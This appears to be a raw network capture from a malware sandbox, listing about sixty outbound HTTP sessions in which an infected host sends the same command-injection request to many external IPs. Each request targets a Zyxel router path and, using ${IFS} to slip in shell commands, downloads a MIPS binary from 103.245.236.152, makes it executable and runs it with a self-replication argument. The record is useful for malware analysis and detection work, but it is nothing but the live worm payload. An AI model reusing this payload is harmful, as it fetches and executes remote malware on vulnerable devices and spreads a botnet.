                                        Jan 14, 2024 16:18:59.820545912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8603192.168.2.134457057.153.199.37443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.820601940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8604192.168.2.135915693.94.74.240443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.820678949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8605192.168.2.135118897.199.166.49443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.820728064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8606192.168.2.135591877.33.180.83443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.820777893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8607192.168.2.1335398120.154.145.93443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.820822001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8608192.168.2.1347994171.79.57.11443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.820872068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8609192.168.2.1339092144.148.68.21443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.820904970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8610192.168.2.1348204178.81.13.174443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.820960045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8611192.168.2.1342980192.60.155.117443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.821037054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8612192.168.2.134790297.63.44.163443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.821075916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8613192.168.2.1358682208.0.36.85443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.821144104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8614192.168.2.1345456161.89.230.129443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.821196079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8615192.168.2.134949020.133.10.118443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.821230888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8616192.168.2.1335148116.98.172.59443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.821288109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8617192.168.2.135984671.199.158.187443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.821327925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8618192.168.2.1343962113.245.231.115443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.821400881 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8619192.168.2.1345626154.92.101.81443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.821441889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8620192.168.2.135725696.78.154.33443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.821480036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8621192.168.2.1342366195.121.181.38443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.821547031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8622192.168.2.1345950110.79.29.107443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.821605921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8623192.168.2.135193073.68.3.103443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.821676970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8624192.168.2.1348448211.212.18.208443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.821752071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8625192.168.2.1332902141.196.235.166443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.821805954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8626192.168.2.1350082132.186.242.66443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.821871042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8627192.168.2.1334066120.113.131.233443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.821914911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8628192.168.2.134408262.112.179.188443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.821976900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8629192.168.2.1338396158.152.151.218443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.822019100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8630192.168.2.134287079.236.183.128443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.822068930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8631192.168.2.133773654.100.140.167443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.822123051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8632192.168.2.1335032185.162.197.226443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.822175026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8633192.168.2.134239034.163.33.45443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.822235107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8634192.168.2.1354762216.14.94.143443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.822293997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8635192.168.2.133723240.67.81.0443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.822387934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8636192.168.2.1341138108.237.94.228443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.822407007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8637192.168.2.135374259.143.106.214443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.822470903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8638192.168.2.133370898.36.86.22443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.822537899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8639192.168.2.134421653.80.9.142443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.822613955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8640192.168.2.1354502152.100.203.168443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.822664022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8641192.168.2.136044269.126.125.160443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.822736979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8642192.168.2.1335062199.89.159.149443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.822767973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8643192.168.2.133714449.206.150.50443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.822824001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8644192.168.2.134994059.197.164.35443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.822874069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8645192.168.2.133693051.179.188.78443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.822928905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8646192.168.2.135198673.186.238.73443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.822983027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8647192.168.2.1340916198.131.115.8443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.823035002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8648192.168.2.1334584111.11.32.78443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.823098898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8649192.168.2.1359598216.49.180.211443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.823142052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8650192.168.2.1347904132.35.128.116443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.823182106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8651192.168.2.1357326136.68.10.46443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.823265076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8652192.168.2.133700293.44.98.151443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.823318958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8653192.168.2.13430764.240.136.128443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.823405027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8654192.168.2.1343922156.23.86.2443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.823416948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8655192.168.2.1340474202.90.116.174443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.823497057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8656192.168.2.134936648.111.1.23443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.823534966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8657192.168.2.1345502220.11.59.167443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.823596954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8658192.168.2.1353872213.25.95.213443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.823662996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8659192.168.2.1334100142.119.101.172443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.823694944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8660192.168.2.1359470138.40.78.148443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.823775053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8661192.168.2.1341248171.85.120.22443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.823803902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8662192.168.2.135911090.68.112.83443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.823872089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8663192.168.2.1335098122.106.245.86443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.823921919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8664192.168.2.1333686211.196.84.41443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.823976040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8665192.168.2.1336336105.192.64.234443
                                        TimestampBytes transferredDirectionData
